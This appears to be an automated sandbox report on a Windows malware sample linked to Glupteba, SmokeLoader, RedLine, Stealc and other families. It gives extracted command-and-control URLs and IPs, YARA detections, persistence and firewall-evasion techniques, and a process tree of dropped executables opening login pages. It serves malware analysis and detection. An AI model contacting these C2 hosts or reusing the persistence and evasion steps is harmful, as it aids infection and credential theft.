glupteba | 2b8f4c0ecc263a12cbbd13f81443234101045ed12bc90f353eb08ccf6ee3aa6b

Analysis

max time kernel
2s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
12/11/2023, 02:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe
Size

1.0MB
MD5

7de2b4b0ffc4d0cd1e794ae46221ba77
SHA1

bce24476aad069b38a7ed982be64de9096b25eec
SHA256

2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0
SHA512

84fc6c1a628d655471dce59754e63e4d855b0bb64540ef4407eb415ddc88435ab232af7f2a80e9c2920b211c6953cbfc5b613ca85465c4c56bfcd773b0d4185c
SSDEEP

24576:OyVNy4JP5hHQWReaeoIsdCxGDNTDrQamyNZC+e5nXAWg7:dT9JP5ZhBe/YEG1X++eVAWg

Score

10^/10

glupteba mystic redline smokeloader stealc zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan

Malware Config

Extracted

Family

smokeloader

Version

2022

http://5.42.92.190/fks/index.php

rc4.i32

Extracted

Family

redline

Botnet

taiga

5.42.92.51:19057

Extracted

Family

stealc

http://77.91.68.247

Attributes

url_path
/c36258786fdc16da.php

rc4.plain

Extracted

Family

smokeloader

Botnet

up3

Signatures

Detect Mystic stealer payload 4 IoCs

resource	yara_rule
behavioral1/memory/7972-343-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/7972-357-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/7972-355-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/7972-354-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family

Detect ZGRat V1 17 IoCs

resource	yara_rule
behavioral1/memory/3664-1638-0x00000209FFA10000-0x00000209FFAF4000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1642-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1643-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1645-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1647-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1649-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1651-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1654-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1658-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1662-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1666-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1670-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1674-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1678-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1682-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1688-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1
behavioral1/memory/3664-1694-0x00000209FFA10000-0x00000209FFAF1000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

resource	yara_rule
behavioral1/memory/6116-1730-0x0000000002F30000-0x000000000381B000-memory.dmp	family_glupteba
behavioral1/memory/6116-1734-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Mystic
Mystic is an infostealer written in C++.
stealer mystic
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral1/memory/3744-872-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/memory/7224-1478-0x0000000000400000-0x000000000046F000-memory.dmp	family_redline
behavioral1/memory/7224-1481-0x0000000000540000-0x000000000059A000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
3332	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 3 IoCs

pid	Process
2980	Lj9gA12.exe
3156	Er0uW61.exe
4660	1gJ47Yq4.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	Lj9gA12.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	Er0uW61.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000022e25-20.dat	autoit_exe
behavioral1/files/0x0007000000022e25-19.dat	autoit_exe

Launches sc.exe 12 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6748	sc.exe
8064	sc.exe
8148	sc.exe
5376	sc.exe
4396	sc.exe
1660	sc.exe
7440	sc.exe
6432	sc.exe
4728	sc.exe
1584	sc.exe
6388	sc.exe
2384	sc.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
8148	7972	WerFault.exe	155
7188	1768	WerFault.exe	209

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3736	schtasks.exe
7888	schtasks.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4660	1gJ47Yq4.exe
4660	1gJ47Yq4.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
4660	1gJ47Yq4.exe
4660	1gJ47Yq4.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 2980	2340	2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe	43
PID 2340 wrote to memory of 2980	2340	2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe	43
PID 2340 wrote to memory of 2980	2340	2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe	43
PID 2980 wrote to memory of 3156	2980	Lj9gA12.exe	42
PID 2980 wrote to memory of 3156	2980	Lj9gA12.exe	42
PID 2980 wrote to memory of 3156	2980	Lj9gA12.exe	42
PID 3156 wrote to memory of 4660	3156	Er0uW61.exe	41
PID 3156 wrote to memory of 4660	3156	Er0uW61.exe	41
PID 3156 wrote to memory of 4660	3156	Er0uW61.exe	41

C:\Users\Admin\AppData\Local\Temp\2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe
"C:\Users\Admin\AppData\Local\Temp\2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2980
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe
    3⤵
    PID:8056
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe
  2⤵
  PID:1968
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3744

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
  2⤵
  PID:2248
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
    3⤵
    PID:4656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:1
    3⤵
    PID:6080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
    3⤵
    PID:2580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
    3⤵
    PID:5144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
    3⤵
    PID:6380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
    3⤵
    PID:6616
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1
    3⤵
    PID:6796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
    3⤵
    PID:6968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1
    3⤵
    PID:7128
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
    3⤵
    PID:6484
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:1
    3⤵
    PID:5916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
    3⤵
    PID:5688
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
    3⤵
    PID:2960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
    3⤵
    PID:3036
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
    3⤵
    PID:4968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
    3⤵
    PID:1776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
    3⤵
    PID:3080
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
    3⤵
    PID:5740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
    3⤵
    PID:6348
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7624 /prefetch:8
    3⤵
    PID:7500
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7624 /prefetch:8
    3⤵
    PID:7516
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=168 /prefetch:1
    3⤵
    PID:7608
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
    3⤵
    PID:7800
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
    3⤵
    PID:7776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7364 /prefetch:1
    3⤵
    PID:4280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1
    3⤵
    PID:2736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,17977705923808353863,18090059445410645105,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8212 /prefetch:8
    3⤵
    PID:8064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
  2⤵
  PID:4272
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,10136605320972961881,16308667717975078622,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
    3⤵
    PID:5644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,10136605320972961881,16308667717975078622,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1860 /prefetch:2
    3⤵
    PID:5636
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
    3⤵
    PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
  2⤵
  PID:1812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
    3⤵
    PID:2804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,6256346501603162321,8408483234463070133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
    3⤵
    PID:6180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
  2⤵
  PID:6448
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
    3⤵
    PID:6472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
  2⤵
  PID:6828
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x168,0x16c,0x148,0x170,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
    3⤵
    PID:6960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
  2⤵
  PID:4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
  2⤵
  PID:5424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
  2⤵
  PID:4516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
  2⤵
  PID:3164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
  2⤵
  PID:4204

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3156
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
  2⤵
